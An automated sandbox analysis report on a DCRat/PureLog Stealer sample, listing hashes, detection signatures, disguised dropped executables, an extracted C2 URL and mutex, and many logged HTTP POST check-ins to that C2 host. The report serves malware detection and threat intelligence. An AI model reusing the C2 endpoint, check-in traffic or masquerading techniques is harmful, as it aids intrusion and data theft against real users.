Windows Analysis Report
0JLWNg4Sz1.exe

Overview

General Information

Sample name: 0JLWNg4Sz1.exe
renamed because original name is a hash value
Original sample name: 844679E76D8254BEDD67C98610F7D7AC.exe
Analysis ID: 1545098
MD5: 844679e76d8254bedd67c98610f7d7ac
SHA1: 4222ebbb055830096b829f072783423dbe255932
SHA256: 9b08f03985d3378123ba236fae1b41b42fcc9af87932655a5120e04fa9a21942
Tags: DCRat, exe, user-abuse_ch

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Creates processes via WMI
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection

Source: 0JLWNg4Sz1.exe Avira: detected
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\oLZ05R153F.bat Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Recovery\StartMenuExperienceHost.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: 00000000.00000002.1708169450.0000000013471000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: DCRat {"C2 url": "http://977255cm.nyashkoon.in/secureWindows", "MUTEX": "DCR_MUTEX-sKFQIzXKnAf7PnSalSzG"}
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe ReversingLabs: Detection: 65%
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe ReversingLabs: Detection: 65%
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe ReversingLabs: Detection: 65%
Source: C:\Recovery\DViaOgnvmAhwCXZ.exe ReversingLabs: Detection: 65%
Source: C:\Recovery\StartMenuExperienceHost.exe ReversingLabs: Detection: 65%
Source: C:\Users\user\Desktop\ALzNWdSZ.log ReversingLabs: Detection: 23%
Source: C:\Users\user\Desktop\KjTCumlu.log ReversingLabs: Detection: 23%
Source: 0JLWNg4Sz1.exe ReversingLabs: Detection: 65%
Source: 0JLWNg4Sz1.exe Virustotal: Detection: 56%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Joe Sandbox ML: detected
Source: C:\Recovery\StartMenuExperienceHost.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Joe Sandbox ML: detected
Source: 0JLWNg4Sz1.exe Joe Sandbox ML: detected
Source: 0JLWNg4Sz1.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 0JLWNg4Sz1.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File opened: C:\Users\user
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File opened: C:\Users\user\AppData\Local

Networking

Source: Network traffic Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49730 -> 188.114.96.3:80
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: Joe Sandbox View IP Address: 188.114.96.3
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 384Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1312Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
